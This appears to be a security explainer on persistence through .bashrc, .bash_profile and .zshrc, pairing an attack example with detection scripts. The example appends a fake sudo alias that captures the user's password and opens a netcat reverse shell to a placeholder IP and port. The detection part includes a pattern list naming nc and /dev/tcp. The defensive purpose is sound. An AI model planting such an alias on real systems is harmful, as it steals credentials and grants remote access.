Persistence through .bashrc and .bash_profile

While editing your .bashrc and .bash_profile is a great way to customize your bash experience, an adversary can use the same files as a persistence mechanism: anything appended to them runs every time the user opens a shell. The files the shell sources at startup, such as ~/.bashrc, ~/.bash_profile and ~/.zshrc, can all be used this way.
The example malicious code below appends a `sudo` alias to any of those files. The next time the user runs sudo, the alias prompts for and captures the password, passes it to the real sudo, and has a bash shell call out to <ip> and <port>.

Example Code:

    # <var> is the name of the variable holding the hidden temp filename; <ip> and <port>
    # are the listener the shell calls back to. All four are placeholders.
    <var>="<.hidden filename>"
    cat << EOF > /tmp/$<var>
    alias sudo='locale=$(locale | grep LANG | cut -d= -f2 | cut -d_ -f1);if [ \$locale = "en" ]; then echo -n "[sudo] password for \$USER: ";fi;read -s pwd;echo; unalias sudo; echo "\$pwd" | /usr/bin/sudo -S nohup nc <ip> <port> -e /bin/bash > /dev/null && /usr/bin/sudo -S '
    EOF
    # append the alias to whichever startup files exist, then remove the temp file
    if [ -f ~/.bashrc ]; then
        cat /tmp/$<var> >> ~/.bashrc
    fi
    if [ -f ~/.zshrc ]; then
        cat /tmp/$<var> >> ~/.zshrc
    fi
    rm /tmp/$<var>

This is easy to detect by checking these files for unexpected additions, or by using code like the following to alert on recent changes.

Example Detection Code:

    # Alert if a shell startup file in $HOME changed in the last $MIN minutes.
    # Only change time (-cmin) and modification time (-mmin) are checked: access time
    # (-amin) is updated every time a shell sources the file, so it would fire on every login.
    MIN=30
    MOD=$(find "$HOME" -maxdepth 1 \
        \( -name '.bashrc' -o -name '.bash_profile' -o -name '.zshrc' \) \
        \( -cmin "-$MIN" -o -mmin "-$MIN" \))
    if [ -n "$MOD" ]; then
        notify-send -u critical -t 0 -i /usr/share/icons/gnome/32x32/status/dialog-warning.png "Shell startup file modified: $MOD"
    fi

Add a cron job to run the script every 30 minutes (the check window above matches the schedule):

    */30 * * * * /bin/bash /<path>/
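A timestamp check only says that a file changed, not what was added. The bash script below is an added example (not code from the original page): it keeps a baseline copy of each startup file, reports files that differ from the baseline, and flags added lines that redefine sudo/ssh/su or invoke netcat, which is exactly the footprint of the alias above. The `RC_FILES` list and the `rc_baseline`/`rc_check` names are this example's own choices.

```bash
#!/usr/bin/env bash
# Baseline-and-diff check for shell startup files (added example, not from the page).

RC_FILES=".bashrc .bash_profile .profile .zshrc"

# rc_baseline <home> <baseline_dir>: snapshot the current startup files.
rc_baseline() {
  local home="$1" base="$2" f
  mkdir -p "$base"
  for f in $RC_FILES; do
    if [ -f "$home/$f" ]; then cp "$home/$f" "$base/$f"; fi
  done
}

# rc_check <home> <baseline_dir>: print NEW/MODIFIED files and the lines added
# since the baseline; returns 1 if anything changed, 0 if everything matches.
rc_check() {
  local home="$1" base="$2" f changed=0
  for f in $RC_FILES; do
    [ -f "$home/$f" ] || continue
    if [ ! -f "$base/$f" ]; then
      echo "NEW $f"; changed=1; continue
    fi
    if ! cmp -s "$base/$f" "$home/$f"; then
      changed=1
      echo "MODIFIED $f"
      # '>' lines in plain diff output are lines present now but absent from the baseline
      diff "$base/$f" "$home/$f" | grep '^>' | sed 's/^> //' | while IFS= read -r line; do
        case "$line" in
          *"alias sudo="*|*"alias ssh="*|*"alias su="*|*" nc "*|*"/dev/tcp/"*)
            echo "  SUSPICIOUS: $line" ;;
          *)
            echo "  added: $line" ;;
        esac
      done
    fi
  done
  return $changed
}

# Usage: snapshot once, then re-run the check (e.g. from the cron job above).
#   rc_baseline "$HOME" "$HOME/.rc-baseline"
#   rc_check    "$HOME" "$HOME/.rc-baseline"
```

Keep the baseline directory outside the user's writable home (or root-owned) if the user account itself is the one you expect to be compromised.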

